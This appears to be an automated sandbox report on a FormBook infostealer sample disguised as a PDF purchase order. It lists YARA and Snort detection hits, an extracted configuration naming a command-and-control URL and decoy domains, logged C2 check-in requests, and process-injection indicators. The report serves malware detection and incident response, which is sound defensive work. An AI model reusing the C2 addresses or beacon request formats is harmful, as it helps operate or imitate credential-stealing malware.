2.2.PO-230821_pdf.exe.400000.0.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x17a39:$sqlite3step: 68 34 1C 7B E1 0x17b4c:$sqlite3step: 68 34 1C 7B E1 0x17a68:$sqlite3text: 68 38 2A 90 C5 0x17b8d:$sqlite3text: 68 38 2A 90 C5 0x17a7b:$sqlite3blob: 68 53 D8 7F 8C 0x17ba3:$sqlite3blob: 68 53 D8 7F 8C
0.2.PO-230821_pdf.exe.2470000.1.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0.2.PO-230821_pdf.exe.2470000.1.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0.2.PO-230821_pdf.exe.2470000.1.raw.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
0.2.PO-230821_pdf.exe.2470000.1.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0.2.PO-230821_pdf.exe.2470000.1.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18839:$sqlite3step: 68 34 1C 7B E1 0x1894c:$sqlite3step: 68 34 1C 7B E1 0x18868:$sqlite3text: 68 38 2A 90 C5 0x1898d:$sqlite3text: 68 38 2A 90 C5 0x1887b:$sqlite3blob: 68 53 D8 7F 8C 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
Click to see the 15 entries

Snort Signatures

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.2.9 - Destination IP: 34.102.136.180

Timestamp:	192.168.2.934.102.136.18049713802031412 08/22/23-13:43:19.690083
SID:	2031412
Source Port:	49713
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.2.9 - Destination IP: 1.1.1.1

Timestamp:	192.168.2.91.1.1.149710802031412 08/22/23-13:42:15.993943
SID:	2031412
Source Port:	49710
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.2.9 - Destination IP: 35.233.138.132

Timestamp:	192.168.2.935.233.138.13249712802031412 08/22/23-13:42:58.501536
SID:	2031412
Source Port:	49712
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.2.9 - Destination IP: 217.70.184.50

Timestamp:	192.168.2.9217.70.184.5049715802031412 08/22/23-13:44:02.774000
SID:	2031412
Source Port:	49715
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.2.9 - Destination IP: 66.96.162.129

Timestamp:	192.168.2.966.96.162.12949711802031412 08/22/23-13:42:37.152483
SID:	2031412
Source Port:	49711
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.2.9 - Destination IP: 188.114.97.7

Timestamp:	192.168.2.9188.114.97.749714802031412 08/22/23-13:43:41.839079
SID:	2031412
Source Port:	49714
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.2.9 - Destination IP: 34.149.87.45

Timestamp:	192.168.2.934.149.87.4549716802031412 08/22/23-13:44:28.778609
SID:	2031412
Source Port:	49716
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.2.9 - Destination IP: 107.148.25.122

Timestamp:	192.168.2.9107.148.25.12249733802031412 08/22/23-13:45:13.541361
SID:	2031412
Source Port:	49733
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000005.00000002.3555201775.0000000000B00000.00000040.80000000.00040000.00000000.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.zachmahl.com/sn26/"], "decoy": ["resenha10.bet", "gulshan-rajput.com", "xbus.tech", "z813my.cfd", "wlxzjlny.cfd", "auntengotiempo.com", "canada-reservation.com", "thegiftcompany.shop", "esthersilveirapropiedades.com", "1wapws.top", "ymjblnvo.cfd", "termokimik.net", "kushiro-artist-school.com", "bmmboo.com", "caceresconstructionservices.com", "kentuckywalkabout.com", "bringyourcart.com", "miamiwinetour.com", "bobcatsocial.site", "thirdmind.network", "4tbbwa.com", "rhinosecurellc.net", "rdparadise.com", "radpm.xyz", "thewhiteorchidspa.com", "clhynfco.cfd", "ngohcvja.cfd", "woodennickelcandles.com", "gg18rb.cfd", "qcdrxwr.cfd", "974dp.com", "lagardere-vivendi-corp.net", "chestnutmaretraining.com", "seosjekk.online", "ahevrlh.xyz", "uedam.xyz", "natrada.love", "yoywvfw.top", "unifiedtradingjapan.com", "chinakaldi.com", "agenciacolmeiadigital.com", "wdlzzfkc.cfd", "097850.com", "xingcansy.com", "uahrbqtj.cfd", "charliehaywood.com", "witheres.shop", "sqiyvdrx.cfd", "biopfizer.com", "tiktokviewer.com", "prftwgmw.cfd", "sfsdnwpf.cfd", "linkboladewahub.xyz", "orvados.com", "goodshepherdopcesva.com", "christianlovewv.com", "cdicontrols.com", "hawskio26.click", "ownlegalhelp.com", "tiydmdzp.cfd", "ppirr.biz", "stonyatrick.com", "itsamazingbarley.com", "msjbaddf.cfd"]}

Multi AV Scanner detection for submitted file

Source: PO-230821_pdf.exe	ReversingLabs: Detection: 68%
Source: PO-230821_pdf.exe	Virustotal: Detection: 42%			Perma Link

Yara detected FormBook

Source: Yara match	File source: 0.2.PO-230821_pdf.exe.2470000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.PO-230821_pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.PO-230821_pdf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PO-230821_pdf.exe.2470000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.3555201775.0000000000B00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3579059104.00000000047A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1174359010.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1089258487.0000000002470000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1177156109.0000000000D40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1174806021.0000000000990000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3575195181.0000000003030000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Antivirus detection for URL or domain

Source: http://www.ymjblnvo.cfd/sn26/lJ	Avira URL Cloud: Label: malware
Source: http://www.kentuckywalkabout.com/sn26/www.qcdrxwr.cfd	Avira URL Cloud: Label: malware
Source: http://www.uahrbqtj.cfd/sn26/?kJBLpb8=ueTspPcvStQ4P/B/BGMviMSUI7+26iAWBkDAplOqW0XstMbPZQlOryCbf8ldO6To/Dtn&ML0tl=NZlpi	Avira URL Cloud: Label: malware
Source: http://www.zachmahl.com/sn26/www.uahrbqtj.cfd	Avira URL Cloud: Label: malware
Source: http://www.4tbbwa.com/sn26/	Avira URL Cloud: Label: malware
Source: http://www.974dp.com/sn26/	Avira URL Cloud: Label: malware
Source: www.zachmahl.com/sn26/	Avira URL Cloud: Label: malware
Source: http://www.thewhiteorchidspa.com/sn26/	Avira URL Cloud: Label: malware
Source: http://www.bmmboo.com/sn26/	Avira URL Cloud: Label: malware
Source: http://www.uedam.xyz/sn26/	Avira URL Cloud: Label: phishing
Source: http://www.ahevrlh.xyz/sn26/?kJBLpb8=K4V3qd++KPCvHN0rtQuWoGyJj5p2Mca2XR5lWleZSjXEQHmkvvLfGF2tUiVxqdSsVX/P&ML0tl=NZlpi	Avira URL Cloud: Label: phishing
Source: http://www.974dp.com	Avira URL Cloud: Label: malware
Source: http://www.kentuckywalkabout.com	Avira URL Cloud: Label: phishing
Source: http://www.974dp.com/sn26/www.bmmboo.com	Avira URL Cloud: Label: malware
Source: http://www.ownlegalhelp.com/sn26/	Avira URL Cloud: Label: malware
Source: http://www.thewhiteorchidspa.com/sn26/www.zachmahl.com	Avira URL Cloud: Label: malware
Source: http://www.canada-reservation.com	Avira URL Cloud: Label: phishing
Source: http://www.qcdrxwr.cfd/sn26/www.uedam.xyz	Avira URL Cloud: Label: phishing
Source: http://www.thirdmind.network/sn26/www.thewhiteorchidspa.com	Avira URL Cloud: Label: malware
Source: http://www.bmmboo.com/sn26/www.ownlegalhelp.com	Avira URL Cloud: Label: malware
Source: http://www.uahrbqtj.cfd	Avira URL Cloud: Label: malware
Source: http://www.ymjblnvo.cfd/sn26/	Avira URL Cloud: Label: malware
Source: http://www.bmmboo.com	Avira URL Cloud: Label: malware
Source: http://www.wdlzzfkc.cfd/sn26/www.canada-reservation.com	Avira URL Cloud: Label: malware
Source: http://www.thirdmind.network/sn26/?kJBLpb8=JTmN6zoWWGNjq6ib/pFFv2cag4i5j1OLo1K7cxhy0Qg9CF/c4lTnOzzR4r51HW/WUnmz&ML0tl=NZlpi	Avira URL Cloud: Label: malware
Source: http://www.zachmahl.com/sn26/	Avira URL Cloud: Label: malware
Source: http://www.ownlegalhelp.com	Avira URL Cloud: Label: malware
Source: http://www.thirdmind.network/sn26/	Avira URL Cloud: Label: malware
Source: http://www.thewhiteorchidspa.com	Avira URL Cloud: Label: malware
Source: http://www.uahrbqtj.cfd/sn26/	Avira URL Cloud: Label: malware
Source: http://www.ymjblnvo.cfd	Avira URL Cloud: Label: malware
Source: http://www.thirdmind.network	Avira URL Cloud: Label: malware
Source: http://www.4tbbwa.com/sn26/?kJBLpb8=CpYCJqaIXUbm3IVdfGXcfWVbwpqiZyf/2rRsJh0RGmHsf115fz67BvVx/+oGOa6+KG1D&ML0tl=NZlpi	Avira URL Cloud: Label: malware
Source: http://www.uedam.xyz	Avira URL Cloud: Label: malware
Source: http://www.ahevrlh.xyz/sn26/www.thirdmind.network	Avira URL Cloud: Label: phishing
Source: http://www.ownlegalhelp.com/sn26/www.4tbbwa.com	Avira URL Cloud: Label: malware
Source: http://www.4tbbwa.com/sn26/www.ahevrlh.xyz	Avira URL Cloud: Label: malware
Source: http://www.4tbbwa.com	Avira URL Cloud: Label: malware
Source: http://www.qcdrxwr.cfd/sn26/	Avira URL Cloud: Label: phishing
Source: http://www.qcdrxwr.cfd	Avira URL Cloud: Label: phishing
Source: http://www.uahrbqtj.cfd/sn26/www.wdlzzfkc.cfd	Avira URL Cloud: Label: malware
Source: http://www.canada-reservation.com/sn26/www.kentuckywalkabout.com	Avira URL Cloud: Label: malware
Source: http://www.ownlegalhelp.com/sn26/?kJBLpb8=ad9cmfoqC6MwmQXB3DEhd3FKpHJj9M1rumkw8RT4btYHOQ1rLKeZlf6UtJZu69H1aK6T&ML0tl=NZlpi	Avira URL Cloud: Label: malware
Source: http://www.wdlzzfkc.cfd/sn26/	Avira URL Cloud: Label: malware
Source: http://www.1wapws.top/sn26/www.ymjblnvo.cfd	Avira URL Cloud: Label: phishing
Source: http://www.canada-reservation.com/sn26/	Avira URL Cloud: Label: malware
Source: http://www.bmmboo.com/sn26/?kJBLpb8=EN17TsAzaZG5OYgbKAyh3RhQlZ+M+bHTnDIlweAI/VTqrT2/7Z1rXkvFwetHy2WBWOd9&ML0tl=NZlpi	Avira URL Cloud: Label: malware
Source: http://www.ahevrlh.xyz/sn26/	Avira URL Cloud: Label: phishing
Source: http://www.kentuckywalkabout.com/sn26/	Avira URL Cloud: Label: malware
Source: http://www.uedam.xyz/sn26/www.1wapws.top	Avira URL Cloud: Label: phishing
Source: http://www.974dp.com/sn26/?kJBLpb8=qaEGeuQorcUQurUZCuE8d9pas+Z0M0brqtX248JBolEfq8j8F1R9i1jKZexhxY54UlRG&ML0tl=NZlpi	Avira URL Cloud: Label: malware
Source: http://www.1wapws.top	Avira URL Cloud: Label: malware
Source: http://www.1wapws.top/sn26/	Avira URL Cloud: Label: phishing

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\nsv6B4F.tmp\hutskogno.dll

ReversingLabs: Detection: 66%

Machine Learning detection for sample

Source: PO-230821_pdf.exe

Joe Sandbox ML: detected

Source: PO-230821_pdf.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: PO-230821_pdf.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: wntdll.pdbUGP source: PO-230821_pdf.exe, 00000000.00000003.1071081018.00000000033E0000.00000004.00001000.00020000.00000000.sdmp, PO-230821_pdf.exe, 00000000.00000003.1061552946.0000000003210000.00000004.00001000.00020000.00000000.sdmp, PO-230821_pdf.exe, 00000002.00000002.1175067955.0000000000B1D000.00000040.00001000.00020000.00000000.sdmp, PO-230821_pdf.exe, 00000002.00000003.1085830988.0000000000843000.00000004.00000020.00020000.00000000.sdmp, PO-230821_pdf.exe, 00000002.00000002.1175067955.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, PO-230821_pdf.exe, 00000002.00000003.1079126719.000000000069F000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000005.00000002.3580763090.00000000049F0000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000005.00000002.3580763090.0000000004B1D000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000005.00000003.1174837585.00000000046A0000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000005.00000003.1181131787.000000000484A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: control.pdb source: PO-230821_pdf.exe, 00000002.00000002.1177684614.00000000027B0000.00000040.10000000.00040000.00000000.sdmp, PO-230821_pdf.exe, 00000002.00000002.1174512830.00000000004C8000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000005.00000002.3558576622.0000000000D10000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: PO-230821_pdf.exe, PO-230821_pdf.exe, 00000002.00000002.1175067955.0000000000B1D000.00000040.00001000.00020000.00000000.sdmp, PO-230821_pdf.exe, 00000002.00000003.1085830988.0000000000843000.00000004.00000020.00020000.00000000.sdmp, PO-230821_pdf.exe, 00000002.00000002.1175067955.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, PO-230821_pdf.exe, 00000002.00000003.1079126719.000000000069F000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000005.00000002.3580763090.00000000049F0000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000005.00000002.3580763090.0000000004B1D000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000005.00000003.1174837585.00000000046A0000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000005.00000003.1181131787.000000000484A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: control.pdbUGP source: PO-230821_pdf.exe, 00000002.00000002.1177684614.00000000027B0000.00000040.10000000.00040000.00000000.sdmp, PO-230821_pdf.exe, 00000002.00000002.1174512830.00000000004C8000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000005.00000002.3558576622.0000000000D10000.00000040.80000000.00040000.00000000.sdmp

Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 0_2_00405D74 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_00405D74
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 0_2_0040699E FindFirstFileW,FindClose,	0_2_0040699E
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 0_2_0040290B FindFirstFileW,	0_2_0040290B

Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 4x nop then pop esi	2_2_00417317
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 4x nop then pop edi	2_2_00417D59
Source: C:\Users\user\Desktop\PO-230821_pdf.exe	Code function: 4x nop then pop edi	2_2_00417DBA

Networking

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 1.1.1.1 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 188.114.97.7 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 35.233.138.132 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 66.96.162.129 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 34.102.136.180 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 217.70.184.50 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 34.149.87.45 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 107.148.25.122 80	Jump to behavior

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.9:49710 -> 1.1.1.1:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.9:49711 -> 66.96.162.129:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.9:49712 -> 35.233.138.132:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.9:49713 -> 34.102.136.180:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.9:49714 -> 188.114.97.7:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.9:49715 -> 217.70.184.50:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.9:49716 -> 34.149.87.45:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.9:49733 -> 107.148.25.122:80

Performs DNS queries to domains with low reputation

Source:

DNS query: www.ahevrlh.xyz

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: www.zachmahl.com/sn26/

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: global traffic	HTTP traffic detected: GET /sn26/?kJBLpb8=qaEGeuQorcUQurUZCuE8d9pas+Z0M0brqtX248JBolEfq8j8F1R9i1jKZexhxY54UlRG&ML0tl=NZlpi HTTP/1.1Host: www.974dp.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /sn26/?kJBLpb8=EN17TsAzaZG5OYgbKAyh3RhQlZ+M+bHTnDIlweAI/VTqrT2/7Z1rXkvFwetHy2WBWOd9&ML0tl=NZlpi HTTP/1.1Host: www.bmmboo.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /sn26/?kJBLpb8=ad9cmfoqC6MwmQXB3DEhd3FKpHJj9M1rumkw8RT4btYHOQ1rLKeZlf6UtJZu69H1aK6T&ML0tl=NZlpi HTTP/1.1Host: www.ownlegalhelp.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /sn26/?kJBLpb8=CpYCJqaIXUbm3IVdfGXcfWVbwpqiZyf/2rRsJh0RGmHsf115fz67BvVx/+oGOa6+KG1D&ML0tl=NZlpi HTTP/1.1Host: www.4tbbwa.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /sn26/?kJBLpb8=K4V3qd++KPCvHN0rtQuWoGyJj5p2Mca2XR5lWleZSjXEQHmkvvLfGF2tUiVxqdSsVX/P&ML0tl=NZlpi HTTP/1.1Host: www.ahevrlh.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /sn26/?kJBLpb8=JTmN6zoWWGNjq6ib/pFFv2cag4i5j1OLo1K7cxhy0Qg9CF/c4lTnOzzR4r51HW/WUnmz&ML0tl=NZlpi HTTP/1.1Host: www.thirdmind.networkConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /sn26/?kJBLpb8=pgVZ8pYUx/mb3SHekAxrqKnjfvNT295Kch72LXoG5YoxLYYfuZ6zPfF7UahT16hGXPUe&ML0tl=NZlpi HTTP/1.1Host: www.thewhiteorchidspa.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /sn26/?kJBLpb8=ueTspPcvStQ4P/B/BGMviMSUI7+26iAWBkDAplOqW0XstMbPZQlOryCbf8ldO6To/Dtn&ML0tl=NZlpi HTTP/1.1Host: www.uahrbqtj.cfdConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: Joe Sandbox View	IP Address: 188.114.97.7 188.114.97.7
Source: Joe Sandbox View	IP Address: 188.114.97.7 188.114.97.7

Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Tue, 22 Aug 2023 11:43:19 GMTContent-Type: text/htmlContent-Length: 291ETag: "64e2b129-123"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8" /> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon" /> <title>Forbidden</title> </head> <body> <h1>Access Forbidden</h1> </body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 22 Aug 2023 11:43:42 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=niAMAwxlvWA95QIpUhUVUJLcGS33J%2FBi9wGcg3FG%2Fb%2BTmuDY91rzpYqRzr%2FwLuB%2Fnogc8EePl5AUiE7eHZdQCuucl8RqktnK1%2FmCVX9lR%2BHT6kH7z6Q%2BdmfyPZE1rZTD2gM%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7faadc0e7b6a3a7e-FRAalt-svc: h3=":443"; ma=86400Data Raw: 39 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a Data Ascii: 92<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Tue, 22 Aug 2023 11:45:18 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>

Source: PO-230821_pdf.exe	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.1wapws.top
Source: explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.1wapws.top/sn26/
Source: explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.1wapws.top/sn26/www.ymjblnvo.cfd
Source: explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.1wapws.topReferer:
Source: explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.4tbbwa.com
Source: explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.4tbbwa.com/sn26/
Source: explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.4tbbwa.com/sn26/www.ahevrlh.xyz
Source: explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.4tbbwa.comReferer:
Source: explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.974dp.com
Source: explorer.exe, 00000003.00000002.3612237552.000000000D6A6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2841546617.000000000D707000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.974dp.com/sn26/
